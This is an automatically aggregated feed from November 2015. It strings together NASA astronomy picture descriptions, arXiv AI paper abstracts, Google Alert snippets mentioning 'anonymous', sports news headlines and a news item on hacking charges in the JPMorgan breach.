An Unexpected Rocket Plume over San Francisco


What is that unusual light in the sky? A common question, this particular light was not only bright but moving and expanding. It appeared just as the astrophotographer and his friend were photographing the Golden Gate Bridge in San Francisco, California against a more predictable night sky. They were not alone in seeing this unusual display -- at least hundreds of people in California reported a similar sight. The consensus of experienced sky observers was that the plume resulted from a rocket launch -- an explanation that was soon confirmed as an unpublicized test of a submarine-launched, unarmed, Trident II D5 nuclear missile. Such tests are not uncommon but do not usually occur just after sunset near a major metropolitan area -- when they are particularly noticeable to many people. Were plume images not posted to the Internet and quickly identified, such a sky spectacle might have been understood by some to be associated with more grandiose -- but incorrect -- explanations. via NASA http://ift.tt/1M6mZ46

Wednesday, November 11, 2015

From Images to Sentences through Scene Description Graphs using Commonsense Reasoning and Knowledge. (arXiv:1511.03292v1 [cs.CV])

In this paper we propose the construction of linguistic descriptions of images. This is achieved through the extraction of scene description graphs (SDGs) from visual scenes using an automatically constructed knowledge base. SDGs are constructed using both vision and reasoning. Specifically, commonsense reasoning is applied on (a) detections obtained from existing perception methods on given images, (b) a "commonsense" knowledge base constructed using natural language processing of image annotations and (c) lexical ontological knowledge from resources such as WordNet. Amazon Mechanical Turk(AMT)-based evaluations on Flickr8k, Flickr30k and MS-COCO datasets show that in most cases, sentences auto-constructed from SDGs obtained by our method give a more relevant and thorough description of an image than a recent state-of-the-art image caption based approach. Our Image-Sentence Alignment Evaluation results are also comparable to that of the recent state-of-the art approaches.



from cs.AI updates on arXiv.org http://ift.tt/1Y5lDvW
via IFTTT

Discovery Radiomics via StochasticNet Sequencers for Cancer Detection. (arXiv:1511.03361v1 [cs.CV])

Radiomics has proven to be a powerful prognostic tool for cancer detection, and has previously been applied in lung, breast, prostate, and head-and-neck cancer studies with great success. However, these radiomics-driven methods rely on pre-defined, hand-crafted radiomic feature sets that can limit their ability to characterize unique cancer traits. In this study, we introduce a novel discovery radiomics framework where we directly discover custom radiomic features from the wealth of available medical imaging data. In particular, we leverage novel StochasticNet radiomic sequencers for extracting custom radiomic features tailored for characterizing unique cancer tissue phenotype. Using StochasticNet radiomic sequencers discovered using a wealth of lung CT data, we perform binary classification on 42,340 lung lesions obtained from the CT scans of 93 patients in the LIDC-IDRI dataset. Preliminary results show significant improvement over previous state-of-the-art methods, indicating the potential of the proposed discovery radiomics framework for improving cancer screening and diagnosis.



from cs.AI updates on arXiv.org http://ift.tt/1PDcK9R
via IFTTT

Instantaneous Modelling and Reverse Engineering of DataConsistent Prime Models in Seconds!. (arXiv:1511.03472v1 [q-bio.QM])

A theoretical framework that supports automated construction of dynamic prime models purely from experimental time series data has been invented and developed, which can automatically generate (construct) data-driven models of any time series data in seconds. This has resulted in the formulation and formalisation of new reverse engineering and dynamic methods for automated systems modelling of complex systems, including complex biological, financial, control, and artificial neural network systems. The systems/model theory behind the invention has been formalised as a new, effective and robust system identification strategy complementary to process-based modelling. The proposed dynamic modelling and network inference solutions often involve tackling extremely difficult parameter estimation challenges, inferring unknown underlying network structures, and unsupervised formulation and construction of smart and intelligent ODE models of complex systems. In underdetermined conditions, i.e., cases of dealing with how best to instantaneously and rapidly construct data-consistent prime models of unknown (or well-studied) complex system from small-sized time series data, inference of unknown underlying network of interaction is more challenging. This article reports a robust step-by-step mathematical and computational analysis of the entire prime model construction process that determines a model from data in less than a minute.



from cs.AI updates on arXiv.org http://ift.tt/1Y5lDvS
via IFTTT

IBMMS Decision Support Tool For Management of Bank Telemarketing. (arXiv:1511.03532v1 [cs.AI])

Although direct marketing is a good method for banks to utilize in the face of global competition and the financial crisis, it has been shown to exhibit poor performance. However, there are some drawbacks to direct campaigns, such as those related to improving the negative attributes that customers ascribe to banks. To overcome these problems, attractive long-term deposit campaigns should be organized and managed more effectively. The aim of this study is to develop an Intelligent Bank Market Management System (IBMMS) for bank managers who want to manage efficient marketing campaigns. IBMMS is the first system developed by combining the power of data mining with the capabilities of expert systems in this area. Moreover, IBMMS includes important features that enable it to be intelligent: a knowledge base, an inference engine and an advisor. Using this system, a manager can successfully direct marketing campaigns and follow the decision schemas of customers both as individuals and as a group; moreover, a manager can make decisions that lead to the desired response by customers.



from cs.AI updates on arXiv.org http://ift.tt/1PDcMyu
via IFTTT

Reasoning about Entailment with Neural Attention. (arXiv:1509.06664v2 [cs.CL] UPDATED)

Automatically recognizing entailment relations between pairs of natural language sentences has so far been the dominion of classifiers employing hand engineered features derived from natural language processing pipelines. End-to-end differentiable neural architectures have failed to approach state-of-the-art performance until very recently. In this paper, we propose a neural model that reads two sentences to determine entailment using long short-term memory units. We extend this model with a word-by-word neural attention mechanism that encourages reasoning over entailments of pairs of words and phrases. Furthermore, we present a qualitative analysis of attention weights produced by this model, demonstrating such reasoning capabilities. On a large entailment dataset this model outperforms the previous best neural model and a classifier with engineered features by a substantial margin. It is the first generic end-to-end differentiable system that achieves state-of-the-art accuracy on a textual entailment dataset.



from cs.AI updates on arXiv.org http://ift.tt/1NRZGOz
via IFTTT

Orioles: Baltimore retaining Chris Davis comes down to price, writes Eddie Matz; 9 other offseason storylines to watch (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

massive, anonymous, mass tourism

Leonardo Hotel Jerusalem: massive, anonymous, mass tourism - See 1396 traveler reviews, 224 candid photos, and great deals for Leonardo Hotel ...

from Google Alert - anonymous http://ift.tt/1iV35ib
via IFTTT

How to allow anonymous profile editing on Wordpress

We have a Wordpress site with CiviCRM. Only a few administrative users are allowed to login. We need to be able to let anonymous users modify their ...

from Google Alert - anonymous http://ift.tt/1M7rk7e
via IFTTT

scala-js/scala-js

the anonymous class is automatically Scala.js-defined. ... val s and var s in the anonymous class desugar to adding the corresponding fields on the ...

from Google Alert - anonymous http://ift.tt/1LatAqm
via IFTTT

Jobs from Anonymous

Anonymous. Leading wine company is looking for a Senior Account Manager. The position entitles responsibility for several leading and premium ...

from Google Alert - anonymous http://ift.tt/1ROiKMd
via IFTTT

MU Campus on Alert after Anonymous Threats

The University of Missouri Police have a suspect in custody this morning in connection with threats made in response to recent protests on the ...

from Google Alert - anonymous http://ift.tt/1SIunFe
via IFTTT

Anonymous (not verified) user creating unwanted Basic Pages

Hi There, I have an issue whereby on a daily basis, an Anonymous (not verified) user keeps creating Basic Pages to the contents at a certain time.

from Google Alert - anonymous http://ift.tt/1HxhmgH
via IFTTT

Anonymous Prayer Request

Anonymous Prayer Request. Even if you only take 5-10 seconds to do it, please say a prayer for my Grandma. She's been really sick the past week, ...

from Google Alert - anonymous http://ift.tt/1M5BwNw
via IFTTT

AE Aurigae and the Flaming Star Nebula


Is star AE Aurigae on fire? No. Even though AE Aurigae is named the flaming star, the surrounding nebula IC 405 is named the Flaming Star Nebula, and the region appears to have the color of fire, there is no fire. Fire, typically defined as the rapid molecular acquisition of oxygen, happens only when sufficient oxygen is present and is not important in such high-energy, low-oxygen environments such as stars. The material that appears as smoke is mostly interstellar hydrogen, but does contain smoke-like dark filaments of carbon-rich dust grains. The bright star AE Aurigae, visible toward the right near the nebula's center, is so hot it is blue, emitting light so energetic it knocks electrons away from surrounding gas. When a proton recaptures an electron, light is emitted, as seen in the surrounding emission nebula. Pictured above, the Flaming Star nebula lies about 1,500 light years distant, spans about 5 light years, and is visible with a small telescope toward the constellation of the Charioteer (Auriga). via NASA http://ift.tt/20JM3Wc

Tuesday, November 10, 2015

Visual Language Modeling on CNN Image Representations. (arXiv:1511.02872v1 [cs.CV])

Measuring the naturalness of images is important to generate realistic images or to detect unnatural regions in images. Additionally, a method to measure naturalness can be complementary to Convolutional Neural Network (CNN) based features, which are known to be insensitive to the naturalness of images. However, most probabilistic image models have insufficient capability of modeling the complex and abstract naturalness that we feel because they are built directly on raw image pixels. In this work, we assume that naturalness can be measured by the predictability on high-level features during eye movement. Based on this assumption, we propose a novel method to evaluate the naturalness by building a variant of Recurrent Neural Network Language Models on pre-trained CNN representations. Our method is applied to two tasks, demonstrating that 1) using our method as a regularizer enables us to generate more understandable images from image features than existing approaches, and 2) unnaturalness maps produced by our method achieve state-of-the-art eye fixation prediction performance on two well-studied datasets.



from cs.AI updates on arXiv.org http://ift.tt/1GW30X7
via IFTTT

A disembodied developmental robotic agent called Samu B\'atfai. (arXiv:1511.02889v1 [cs.AI])

The agent program, called Samu, is an experiment to build a disembodied DevRob (Developmental Robotics) chatter bot that can talk in a natural language like humans do. One of the main design feature is that Samu can be interacted with using only a character terminal. This is important not only for practical aspects of Turing test or Loebner prize, but also for the study of basic principles of Developmental Robotics. Our purpose is to create a rapid prototype of Q-learning with neural network approximators for Samu. We sketch out the early stages of the development process of this prototype, where Samu's task is to predict the next sentence of tales or conversations. The basic objective of this paper is to reach the same results using reinforcement learning with general function approximators that can be achieved by using the classical Q lookup table on small input samples. The paper is closed by an experiment that shows a significant improvement in Samu's learning when using LZW tree to narrow the number of possible Q-actions.



from cs.AI updates on arXiv.org http://ift.tt/1M58KfY
via IFTTT

Spectral-Spatial Classification of Hyperspectral Image Using Autoencoders. (arXiv:1511.02916v1 [cs.CV])

Hyperspectral image (HSI) classification is a hot topic in the remote sensing community. This paper proposes a new framework of spectral-spatial feature extraction for HSI classification, in which for the first time the concept of deep learning is introduced. Specifically, the model of autoencoder is exploited in our framework to extract various kinds of features. First we verify the eligibility of autoencoder by following classical spectral information based classification and use autoencoders with different depth to classify hyperspectral image. Further in the proposed framework, we combine PCA on spectral dimension and autoencoder on the other two spatial dimensions to extract spectral-spatial information for classification. The experimental results show that this framework achieves the highest classification accuracy among all methods, and outperforms classical classifiers such as SVM and PCA-based SVM.



from cs.AI updates on arXiv.org http://ift.tt/1M58JZo
via IFTTT

Detecting events and key actors in multi-person videos. (arXiv:1511.02917v1 [cs.CV])

Multi-person event recognition is a challenging task, often with many people active in the scene but only a small subset contributing to an actual event. In this paper, we propose a model which learns to detect events in such videos while automatically "attending" to the people responsible for the event. Our model does not use explicit annotations regarding who or where those people are during training and testing. In particular, we track people in videos and use a recurrent neural network (RNN) to represent the track features. We learn time-varying attention weights to combine these features at each time-instant. The attended features are then processed using another RNN for event detection/classification. Since most video datasets with multiple people are restricted to a small number of videos, we also collected a new basketball dataset comprising 257 basketball games with 14K event annotations corresponding to 11 event classes. Our model outperforms state-of-the-art methods for both event classification and detection on this new dataset. Additionally, we show that the attention mechanism is able to consistently localize the relevant players.



from cs.AI updates on arXiv.org http://ift.tt/1M58JJ4
via IFTTT

Taxonomy of Pathways to Dangerous AI. (arXiv:1511.03246v1 [cs.AI])

In order to properly handle a dangerous Artificially Intelligent (AI) system it is important to understand how the system came to be in such a state. In popular culture (science fiction movies/books) AIs/Robots became self-aware and as a result rebel against humanity and decide to destroy it. While it is one possible scenario, it is probably the least likely path to appearance of dangerous AI. In this work, we survey, classify and analyze a number of circumstances, which might lead to arrival of malicious AI. To the best of our knowledge, this is the first attempt to systematically classify types of pathways leading to malevolent AI. Previous relevant work either surveyed specific goals/meta-rules which might lead to malevolent behavior in AIs (\"Ozkural, 2014) or reviewed specific undesirable behaviors AGIs can exhibit at different stages of its development (Alexey Turchin, July 10 2015, July 10, 2015).



from cs.AI updates on arXiv.org http://ift.tt/1GW3gFo
via IFTTT

Fuoco e mitragliatrici (Anonymous)

1 Performances. 1.1 Recordings; 1.2 Synthesized/MIDI. 1.2.1 For Voice, Flute and Guitar (Alici). 2 Sheet Music. 2.1 Arrangements and Transcriptions.

from Google Alert - anonymous http://ift.tt/20KTwVc
via IFTTT

It's Argentina vs. Brazil: Neymar in; Messi, Aguero out

BUENOS AIRES, Argentina (AP) It's always special when Argentina and Brazil play, even if this time Argentina goes into the match without stars Lionel Messi and Sergio Aguero.

from FOX Sports Digital http://ift.tt/1MJlAhh
via IFTTT

Ravens: Baltimore (2-6) up three spots to No. 24 in Week 10 NFL power rankings; open here for full rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Rooney plays up to wrestling crowd by slapping WWE star

MANCHESTER, England (AP) Wayne Rooney was goaded into retaliation, and slapped the sportsman. For once, this wasn't the England striker's fiery temperament resurfacing but a playful clash with a WWE star.

from FOX Sports Digital http://ift.tt/1Myhv3y
via IFTTT

dotnet/roslyn

For now just immutable structures are allowed for anonymous classes. ... and behind the scene create anonymous implementing IWorker interface.

from Google Alert - anonymous http://ift.tt/1HFDEHP
via IFTTT

Alerts/Articles

With the rise of anonymous social media apps like Yik Yak, colleges and universities may be required to investigate and respond to reports of ...

from Google Alert - anonymous http://ift.tt/1HFDEHF
via IFTTT

JPMorgan Hack — Three Men Charged in Biggest Bank Hack in History

The US government has charged hackers over the largest ever hacking case in financial history. The US Court of the Southern District of New York has charged three men accused of hacking into many financial institutions, including JPMorgan Chase that, according to the officials, was "the largest theft of user data from a U.S. financial institution in history." JPMorgan Chase is one of


from The Hacker News http://ift.tt/1PAprCi
via IFTTT

Benzema suing for breach of confidentiality in sex tape case

PARIS (AP) Karim Benzema's lawyer will take legal action against a radio station that published a transcript of a conversation between the France striker and a friend which was recorded as part of the investigation over a sex tape involving national teammate Mathieu Valbuena.

from FOX Sports Digital http://ift.tt/1MmpJIG
via IFTTT

Howard, Guzan comfortable with Klinsmann rotation plan

MIAMI SHORES, Fla. (AP) Tim Howard spent eight years as the top goalkeeper for the U.S. national team. Brad Guzan took over for a year during Howard's sabbatical.

from FOX Sports Digital http://ift.tt/1MmpJID
via IFTTT

The Latest: Mutko says head of Moscow lab resigns

LONDON (AP) The Latest from the IAAF investigation (all time local):

from FOX Sports Digital http://ift.tt/1O1NwAh
via IFTTT

The Latest: D'Hooghe: Moscow lab shouldn't affect World Cup

LONDON (AP) The Latest from the IAAF investigation (all time local):

from FOX Sports Digital http://ift.tt/1Sg3Z4O
via IFTTT

Display private webform fields in a view to anonymous users

Hi I am using Webform 7.4 and Views 7.3 I am displaying the webform data submissions in a view I need to display in the view the data which is ...

from Google Alert - anonymous http://ift.tt/1PmVWWe
via IFTTT

Mutko faces FIFA ethics scrutiny for role in Russian scandal

GENEVA (AP) In a clash of sports mired in crisis, the FIFA ethics committee will study Russian Sports Minister Vitaly Mutko's role in his country's damaging doping scandal.

from FOX Sports Digital http://ift.tt/1iRDgiM
via IFTTT

Orioles Buzz: Jerry Crasnick tweets Baltimore one team he's \"hearing a lot of chatter\" about on Royals OF Alex Gordon (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

With Benzema out, France coach Deschamps considers options

CLAIREFONTAINE, France (AP) France's upcoming matches against Germany and England have extra significance in the absence of first-choice striker Karim Benzema.

from FOX Sports Digital http://ift.tt/1QggAYa
via IFTTT

Bob Bradley appointed as Le Havre coach in France

LE HAVRE, France (AP) Former United States coach Bob Bradley is taking over at French second-division club Le Havre.

from FOX Sports Digital http://ift.tt/1MxWK8l
via IFTTT

Free anonymous web proxy list

HELP! We need more examples. If you got 'em, they can be shared using the form below. Thanks! Free anonymous web proxy list. To contribute ...

from Google Alert - anonymous http://ift.tt/1kJYKPU
via IFTTT

Quotes from voters in this week's AP Global Football 10

LONDON (AP) Quotes from voters in this week's Associated Press Global Football 10

from FOX Sports Digital http://ift.tt/1liS0ZU
via IFTTT

Beckenbauer signed deal with Warner ahead of World Cup vote

FRANKFURT, Germany (AP) Franz Beckenbauer signed a contract promising a now disgraced FIFA official ''various services'' shortly before Germany won the vote to stage the 2006 World Cup, the acting president of the German football federation said Tuesday.

from FOX Sports Digital http://ift.tt/1MIX8wt
via IFTTT

Arrested Nepal football players released on bail

KATHMANDU, Nepal (AP) Nepal captain Sagar Thapa and four other players have been released on bail after they were charged with treason following a match-fixing probe which could see them jailed for life.

from FOX Sports Digital http://ift.tt/1NoXg4X
via IFTTT